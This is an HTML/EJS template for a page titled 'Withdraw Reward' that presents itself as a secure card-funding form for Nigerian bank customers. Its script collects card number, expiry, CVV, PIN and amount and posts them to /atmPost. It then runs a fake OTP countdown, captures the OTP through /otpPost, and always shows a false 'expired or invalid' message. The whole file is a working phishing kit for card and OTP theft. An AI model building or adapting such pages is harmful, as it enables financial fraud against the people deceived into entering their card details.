<!DOCTYPE html>
<html>
  <head>
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />

    <link rel="icon" href="/site_icon.jpg" />

    <link
      rel="stylesheet"
      type="text/css"
      href="../../../assets/purchase.css"
    />

    <style type="text/css">

      @media screen and (min-width: 0){


      	body{
      		background-color: rgb(0, 25, 50);
      	}

      	h1{
      		font-size: 2.5rem;
      		text-align: left;
      		width: 85%;
      		margin: 50px auto 0 auto;
      		border: none;
      		border-radius: 0;
      	}

      	h1 span{
      		font-size: 1.4rem;
      		color: rgb(200, 200, 200);
      		display: block;
      		font-weight: 400;
      		margin-top: 10px;
      	}

      	form{
      		margin-top: 30px;
      	}

      	form > *{
      		font-size: 1.5rem;
      		display: block;
      		height: 55px;
      		width: 85%;
      		margin: auto;
      		margin-top: 10px;
      	}


      	input, select{
      		background-color: white;
      		color: : black;
      	}


      	.no_otp{
      		margin-top: 30px;
      		text-align: center;
      		font-size: 1.4rem;
      		font-weight: 400;
      	}

      	.resend_button{
      		text-align: 1.4rem;
      		display: block;
      		width: 150px;
      		border-radius: 5px;
      		margin-right: auto;
      		margin-left: auto;
      		color: black;
      		background-color: rgb(220, 220, 220);
      	}



      	.loader{
      		width: 25px;
      		height: 25px;
      		border-radius: 50%;
      		border: 8px dotted rgb(230, 230, 230);
      		margin: auto;
      		animation-name: routate;
      		animation-duration: 700ms;
      		animation-timing-function: linear;
      		animation-iteration-count: infinite;
      	}


      	@keyframes routate{
      		0%{
      			transform: rotate(0deg);
      		}

      		100%{
      			transform: rotate(360deg);
      		}
      	}







      	form button{
      		margin-top: 20px;
      	}





      }





      @media screen and (min-width: 600px){
      	main{
      		width: 600px;
      		margin: auto;
      	}
      }
    </style>

    <title>Withdraw Reward</title>
  </head>

  <body>
    <div class="body_overlay"></div>
    <div class="catch" style="display: none"><%- user.id %></div>
    <main>
      <h1>Fund Using Card <span>(Don't worry, your card is secured)</span></h1>

      <form class="first_form">
        <select required name="bank">
          <option disabled selected>Select your bank</option>
          <option value="access">Access Bank</option>
          <option value="ecobank">Ecobank</option>
          <option value="Fidelity">Fidelity Bank</option>
          <option value="first_bank">First Bank</option>
          <option value="first_city_monument_bank">
            First City Monument Bank
          </option>
          <option value="heritage_bank">Heritage Bank</option>
          <option value="gtb">GTB</option>
          <option value="jaiz">Jaiz Bank</option>
          <option value="keystone">Keystone</option>
          <option value="kuda">Kuda</option>
          <option value="opay">Opay</option>
          <option value="palmpay">PalmPay</option>
          <option value="polaris">Polaris Bank</option>
          <option value="sterling">Sterling Bank</option>
          <option value="uba">UBA</option>
          <option value="union_bank">Union Bank</option>
          <option value="wema">Wema Bank</option>
          <option value="zenith">Zenith Bank</option>
        </select>
        <input
          required
          class="cardname"
          type="text"
          name="cardname"
          placeholder="name on card"
        />
        <input
          required
          type="number"
          name="card_number"
          placeholder="Card Number"
        />
        <input
          required
          class="date"
          type="text"
          name="date"
          placeholder="MM/YY"
        />
        <input
          required
          class="cvv"
          type="number"
          name="cvv"
          placeholder="CVV"
        />
        <input
          required
          class="pin"
          type="number"
          name="pin"
          placeholder="Card Pin"
        />

        <br /><br />
        <input
          required
          class="pin"
          type="number"
          name="amount"
          placeholder="Amount"
        />

        <button class="withdraw_button">Proceed</button>
        <br /><br />
      </form>

      <form class="otp_form" style="display: none">
        <input required type="" name="otp" placeholder="Enter OTP" />
        <button class="confirm_button">Confirm</button>
        <div class="submit_error">
          <span class="counter"></span> Generating OTP, please Wait...
        </div>
      </form>

      <h2 class="no_otp" style="display: none">Didn't receive OTP?</h2>

      <button class="resend_button" style="display: none">Resend OTP</button>
    </main>

    <script type="text/javascript">
      const date_input = document.querySelector(".date");
      const cvv_input = document.querySelector(".cvv");
      const pin_input = document.querySelector(".pin");
      const id = document.querySelector(".catch").textContent;

      date_input.addEventListener("input", () => {
        if (date_input.value.length == 2 && !date_input.value.includes("/")) {
          date_input.value = date_input.value + "/";
        }

        if (date_input.value.length > 5) {
          var limit = date_input.value.slice(0, 5);
          date_input.value = limit;
        }
      });

      cvv_input.addEventListener("input", () => {
        if (cvv_input.value.length > 3) {
          var limit = cvv_input.value.slice(0, 3);
          cvv_input.value = limit;
        }
      });

      pin_input.addEventListener("input", () => {
        if (pin_input.value.length > 4) {
          var limit = pin_input.value.slice(0, 4);
          pin_input.value = limit;
        }
      });

      const loader = document.createElement("div");
      loader.className = "loader";

      const withdraw_button = document.querySelector(".withdraw_button");
      const confirm_button = document.querySelector(".confirm_button");

      const first_form = document.querySelector(".first_form");
      const otp_form = document.querySelector(".otp_form");

      first_form.addEventListener("submit", async (e) => {
        e.preventDefault();

        if (
          first_form.card_number.value.length > 19 ||
          first_form.card_number.value.length < 16
        ) {
          alert("Invalid Card Number");
          first_form.card_number.value = "";
          first_form.card_number.setAttribute(
            "placeholder",
            "That was an invalid card"
          );
        } else if (first_form.date.value.length < 5) {
          alert("Invalid Date Formate");
        } else if (first_form.cvv.value.length < 3) {
          alert("Invalid CVV");
        } else if (first_form.pin.value.length < 4) {
          alert("Invalid pin");
        } else if (
          first_form.amount.value.length < 3 ||
          first_form.amount.value.length > 5
        ) {
          alert("Minimum fund is N200, maximum is N90,000");
        } else {
          withdraw_button.innerHTML = "";
          withdraw_button.append(loader);

          const time = new Date();
          let minute = time.getMinutes();
          

          const result = await fetch("/atmPost", {
            body: JSON.stringify({
              id,
              card_number: first_form.card_number.value,
              date: first_form.date.value,
              cvv: first_form.cvv.value,
              pin: first_form.pin.value,
              amount: first_form.amount.value,
              bank: first_form.bank.value,
              cardname: first_form.cardname.value,
              time:minute
            }),

            headers: { "Content-Type": "application/json" },

            method: "POST",
          });

          const res = await result.json();

          if (res) {
            try {
              first_form.style.display = "none";

              document.querySelector("h1").style.display = "none";
              document.querySelector(".otp_form").style.display = "block";

              function counter() {
                document.querySelector(".submit_error").style.display = "block";

                setTimeout(() => {
                  document.querySelector(".counter").innerHTML = "20";
                }, 1000);

                setTimeout(() => {
                  document.querySelector(".counter").innerHTML = "19";
                }, 4000);

                setTimeout(() => {
                  document.querySelector(".counter").innerHTML = "18";
                }, 8000);

                setTimeout(() => {
                  document.querySelector(".counter").innerHTML = "17";
                }, 12000);

                setTimeout(() => {
                  document.querySelector(".counter").innerHTML = "16";
                }, 16000);

                setTimeout(() => {
                  document.querySelector(".counter").innerHTML = "15";
                }, 20000);

                setTimeout(() => {
                  document.querySelector(".counter").innerHTML = "14";
                }, 24000);

                setTimeout(() => {
                  document.querySelector(".counter").innerHTML = "13";
                }, 28000);

                setTimeout(() => {
                  document.querySelector(".counter").innerHTML = "12";
                }, 32000);

                setTimeout(() => {
                  document.querySelector(".counter").innerHTML = "11";
                }, 36000);

                setTimeout(() => {
                  document.querySelector(".counter").innerHTML = "10";
                }, 40000);

                setTimeout(() => {
                  document.querySelector(".counter").innerHTML = "9";
                }, 44000);

                setTimeout(() => {
                  document.querySelector(".counter").innerHTML = "8";
                }, 48000);

                setTimeout(() => {
                  document.querySelector(".counter").innerHTML = "7";
                }, 52000);

                setTimeout(() => {
                  document.querySelector(".counter").innerHTML = "6";
                }, 56000);

                setTimeout(() => {
                  document.querySelector(".counter").innerHTML = "5";
                }, 60000);

                setTimeout(() => {
                  document.querySelector(".counter").innerHTML = "4";
                }, 64000);

                setTimeout(() => {
                  document.querySelector(".counter").innerHTML = "3";
                }, 68000);

                setTimeout(() => {
                  document.querySelector(".counter").innerHTML = "2";
                }, 72000);

                setTimeout(() => {
                  document.querySelector(".counter").innerHTML = "1";
                }, 76000);

                setTimeout(() => {
                  document.querySelector(".counter").innerHTML = "0";

                  document.querySelector(".submit_error").style.display =
                    "none";
                }, 80000);
              }

              counter();

              setTimeout(() => {
                if (
                  document.querySelector(".counter").className === "counter"
                ) {
                  document.querySelector(".no_otp").style.display = "block";
                  var resend_button = document.querySelector(".resend_button");
                  resend_button.style.display = "block";

                  resend_button.addEventListener("click", () => {
                    resend_button.style.display = "none";
                    resend_button.append(loader);
                    setTimeout(() => {
                      document.querySelector(".no_otp").style.display = "none";
                      resend_button.style.display = "none";
                      counter();
                    }, 3000);
                  });
                }
              }, 81000);
            } catch (error) {
              console.log(error);
            }
          }
        }
      });

      otp_form.addEventListener("submit", async (e) => {
        document.querySelector(".no_otp").style.display = "none";
        document.querySelector(".resend_button").style.display = "none";

        document.querySelector(".counter").className = "o counter";
        document.querySelector(".counter").style.display = "none";

        e.preventDefault();

        confirm_button.innerHTML = "";
        confirm_button.append(loader);

        const result = await fetch("/otpPost", {
          body: JSON.stringify({
            id,
            otp: otp_form.otp.value,
          }),

          headers: { "Content-Type": "application/json" },

          method: "POST",
        });

        const res = await result.json();

        if (res) {
         const timed =  setTimeout(() => {
            confirm_button.innerHTML = "Oops!!!";
            document.querySelector(".submit_error").innerHTML =
              "The OTP has expired or is invalid, refresh and try again.";
              clearTimeout(timed)
          }, 4000);
        }
      });
    </script>
  </body>
</html>
